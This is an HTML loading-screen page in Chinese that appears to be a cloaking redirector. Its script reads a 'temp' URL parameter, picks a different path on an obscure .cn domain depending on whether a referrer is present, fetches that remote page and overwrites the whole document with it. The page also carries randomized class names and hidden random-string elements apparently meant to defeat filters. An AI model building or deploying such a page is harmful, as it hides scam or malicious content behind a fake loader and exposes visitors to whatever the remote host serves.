<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ROSw7YJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ROSw7YJ .kv4wLHo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ROSw7YJ .content {
            line-height: 50px;
            text-align: center
        }

        .ROSw7YJ .img {
            width: 100%
        }

        .ROSw7YJ .rqCwE5xux {
            text-align: center
        }

        .ROSw7YJ .rqCwE5xux span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ROSw7YJ .rqCwE5xux span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ROSw7YJ .rqCwE5xux span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ROSw7YJ .rqCwE5xux span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ROSw7YJ .rqCwE5xux span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ROSw7YJ .rqCwE5xux span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ROSw7YJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function llF1mN1WYTL9O(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var N7f9Cjg = llF1mN1WYTL9O('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ N7f9Cjg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ N7f9Cjg +".html?a=share";
		}
		
        mPt3xng=url+"#"+new Date().getTime();
        mPt3xng && function() {
            $.get(mPt3xng, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>t4S4NhJRjbZYd9hAGmnz7lbvNcvBTRbcUbEiNPlSuRx1L6z4aOVN7PLDbnzY0ygnfxKio6QLAKdeM8WSMP88WrA</p>
<a  href='#' style='display:none'>eK0cOXtHZc3N0oCd6Z9WG9wxqo3VCwHa0Z1q5qv</a>
<a  href='#' style='display:none'>eK0cOXtHZc3N0oCd6Z9WG9wxqo3VCwHa0Z1q5qv</a>
<ul style='display:none' >bKUHjXXPSZSK7FnZtLmH3Uy9mvFUMn6dx</ul>
<ul style='display:none' >bKUHjXXPSZSK7FnZtLmH3Uy9mvFUMn6dx</ul>
<img  src='' style='display:none'>
<span style='display:none'>JtLTduQ0JdH50kWy5615xmjODykVcWC8C2cipA5sehDBY7</span>
<p  style='display:none'>t4S4NhJRjbZYd9hAGmnz7lbvNcvBTRbcUbEiNPlSuRx1L6z4aOVN7PLDbnzY0ygnfxKio6QLAKdeM8WSMP88WrA</p>
<span style='display:none'>JtLTduQ0JdH50kWy5615xmjODykVcWC8C2cipA5sehDBY7</span><div class="ROSw7YJ">
    <div class="kv4wLHo">
        <div class="rqCwE5xux">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >pD4zfCU33zkGYj</h1>
<b style='display:none' >bU3zLJ8OHm0RGNeq6qTScyUXvgnoh6ysLmWTctMWWc0aL1lIUPb5tTT9or1mwxIV1H8DkQcX8v0f</b>
<div style='display:none'>xMhLKOzIYUsG4uv42ZzptmlFVPUFRjSC3ybREtSYmCp9fcrB7UuDmKwIJjXMrznhl</div>
<li style='display:none' >vBflqwuygsKdiCBZTreIzKbrpuQGKNkF9DxoT69GjTkp2n9PzSLz9YL6PxlscWZ4xCopzMUQ58Z7c2GS</li></body>
</html>